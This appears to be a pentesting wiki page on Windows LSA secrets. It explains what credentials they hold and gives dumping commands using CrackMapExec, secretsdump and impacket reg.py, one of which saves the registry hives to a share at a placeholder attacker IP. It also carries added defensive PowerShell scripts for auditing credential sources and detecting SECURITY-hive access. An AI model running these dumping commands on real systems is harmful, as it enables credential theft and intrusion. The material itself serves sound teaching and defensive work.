LSA Secrets

Administrator rights on the target machine are mandatory.

The registry stores identification information that a computer needs in order to function properly as a member of a domain. One of the places where this sensitive material is kept is the LSA secrets.

LSA secrets are a special storage area in the registry used to hold sensitive data that is only accessible to the local SYSTEM account. They are stored in encrypted form under HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets, and the parent keys needed to decrypt them are also stored in the registry, under HKEY_LOCAL_MACHINE\SECURITY\Policy.

In LSA secrets you can find:

  • Domain machine account. In order to operate in a domain, a computer needs a machine account in the domain. The username and password for this machine account must therefore be available to the operating system and are therefore stored in the LSA secrets. It should also be noted that the password for this machine account is changed every 30 days by default. This machine account is used by the local SYSTEM account to interact with the domain, but not locally, so this account does not have administrative privileges on the machine.

  • Account passwords for Windows services or scheduled tasks. In order to run a service on behalf of a user, the computer must store that user's password. It is therefore possible to recover cleartext service account passwords from the LSA secrets.

  • Password for auto-logon. If Windows auto-logon is enabled, the password can be stored in the LSA secrets. Alternatively, it can be stored in the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon under the value DefaultPassword. The domain and username are always recorded in DefaultDomainName and DefaultUserName respectively.

  • DPAPI master keys. The Data Protection API (DPAPI) is used to allow users to encrypt sensitive data without having to worry about the cryptographic keys used. If you are able to recover the master keys, you can then decrypt certain user data.

  • Domain Cached Credentials. In addition, in the SECURITY hive file, the credentials of the last domain users to connect to the machine, called Domain Cached Credentials (DCC), are also stored. In this way, the computer can authenticate the domain user even if the connection to the domain controllers is lost. These cached credentials are MSCACHEV2/MSCASH hashes, which are different from NT hashes, and so cannot be used to perform a Pass-The-Hash. However, it is still possible for an attacker to try to crack them offline in order to recover the user's password.

By default, the caching policy allows 10 DCC2 credentials to be stored.
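The list above describes what ends up in LSA secrets; the following read-only audit, added here as an example and not part of the original page, checks a host for each of those sources (auto-logon, the DCC cache size, services and scheduled tasks registered with a stored password). It assumes an elevated PowerShell session on a domain-joined Windows machine; all paths and value names are the standard Windows ones and nothing is written.

```powershell
# Added example (not from the original page): audit the sources of credential
# material that this page says are kept in LSA secrets. Assumes an elevated
# PowerShell session on a domain-joined host; read-only.

$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$wl = Get-ItemProperty -Path $winlogon -ErrorAction Stop

$findings = @()

# 1. Auto-logon. A DefaultPassword value in the Winlogon key is cleartext;
#    AutoAdminLogon=1 without it means the password was placed in LSA secrets.
if ($wl.AutoAdminLogon -eq '1') {
    $where = if ($wl.PSObject.Properties['DefaultPassword']) {
        'cleartext DefaultPassword value in Winlogon key'
    } else {
        'LSA secrets (no DefaultPassword value present)'
    }
    $findings += [pscustomobject]@{
        Check  = 'AutoAdminLogon'
        Detail = "$($wl.DefaultDomainName)\$($wl.DefaultUserName); password stored as: $where"
    }
}

# 2. Domain cached credentials. CachedLogonsCount is a REG_SZ; the default is "10".
$cached = if ($null -ne $wl.CachedLogonsCount) { [int]$wl.CachedLogonsCount } else { 10 }
if ($cached -gt 0) {
    $findings += [pscustomobject]@{
        Check  = 'CachedLogonsCount'
        Detail = "up to $cached DCC2 entries kept in HKLM\SECURITY (lower it on hosts that never need offline domain logon)"
    }
}

# 3. Services running as a named account: their passwords live in LSA secrets.
$findings += Get-CimInstance -ClassName Win32_Service |
    Where-Object { $_.StartName -and $_.StartName -notmatch '^(LocalSystem|NT AUTHORITY\\|NT SERVICE\\)' } |
    ForEach-Object {
        [pscustomobject]@{
            Check  = 'ServiceAccount'
            Detail = "$($_.Name) runs as $($_.StartName) ($($_.State))"
        }
    }

# 4. Scheduled tasks registered with a stored password (principal LogonType = Password).
$findings += Get-ScheduledTask -ErrorAction SilentlyContinue |
    Where-Object { $_.Principal.LogonType -eq 'Password' } |
    ForEach-Object {
        [pscustomobject]@{
            Check  = 'ScheduledTask'
            Detail = "$($_.TaskPath)$($_.TaskName) runs as $($_.Principal.UserId)"
        }
    }

$findings | Format-Table -AutoSize -Wrap
```

Each finding is one place where a password recoverable from the SECURITY hive originates; the usual remediations are a group Managed Service Account or virtual account for services and tasks, removing auto-logon, and reducing CachedLogonsCount where offline logon is not required.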

With CrackMapExec, LSA secrets can be dumped remotely in one command:

cme smb <TARGET> -u <USERNAME> -p <PASSWORD> --lsa

It is possible to use secretsdump to locally parse LSA secrets exported as a file (a dump of the SECURITY hive). The SYSTEM hive is needed as well, since the boot key it contains is required to decrypt the secrets:

# parse exported hives locally
secretsdump.py -system '/path/to/system.save' -security '/path/to/security.save' LOCAL
# dump directly from a remote target
secretsdump.py '<DOMAIN>/<USER>:<PASSWORD>@<TARGET>'

Reg:

reg.py from impacket can also be used to remotely dump LSA secrets by saving the hive to a share:

reg.py "domain"/"user":"password"@"target" save -keyName 'HKLM\SECURITY' -o '\\<ATTACKER_IP>\someshare'

# backup all SAM, SYSTEM and SECURITY hives at once
reg.py "domain"/"user":"password"@"target" backup -o '\\<ATTACKER_IP>\someshare'
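Both the secretsdump and reg.py approaches above have to open the SECURITY hive on the target. The script below, an added example and not code from the page or from impacket, queries the Security event log for handle requests and accesses on that key. It assumes that the "Audit Registry" subcategory of Object Access is enabled and that a read SACL has been placed on HKLM\SECURITY, so that such accesses produce events 4656 and 4663; event IDs and field names are the standard Windows ones.

```powershell
# Added example (not from the original page or impacket): surface accesses to
# the SECURITY hive from the Security event log. Assumes Object Access >
# Audit Registry is enabled and a SACL exists on HKLM\SECURITY.

$events = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4656, 4663 } -ErrorAction SilentlyContinue

$hits = foreach ($e in $events) {
    # Flatten the EventData section into a name -> value table.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    # Registry objects are logged with ObjectType "Key" and a kernel-style path.
    if ($data['ObjectType'] -eq 'Key' -and $data['ObjectName'] -like '\REGISTRY\MACHINE\SECURITY*') {
        [pscustomobject]@{
            Time    = $e.TimeCreated
            Id      = $e.Id
            Subject = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Process = $data['ProcessName']
            Object  = $data['ObjectName']
        }
    }
}

# lsass.exe reads this hive as part of normal operation; anything else, for
# example the Remote Registry service (svchost.exe) saving the key on behalf
# of a network logon, is worth reviewing.
$hits |
    Where-Object { $_.Process -notlike '*\lsass.exe' } |
    Sort-Object Time |
    Format-Table -AutoSize
```

A remote hive save via the Remote Registry service will show the accessing process as svchost.exe under a network logon, while a local tool run shows the tool's own process name; correlating the Subject with the 4624 logon that preceded it gives the source host.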

References:

Almost all the info comes from Hacker Recipes blog. You should definitely check it.
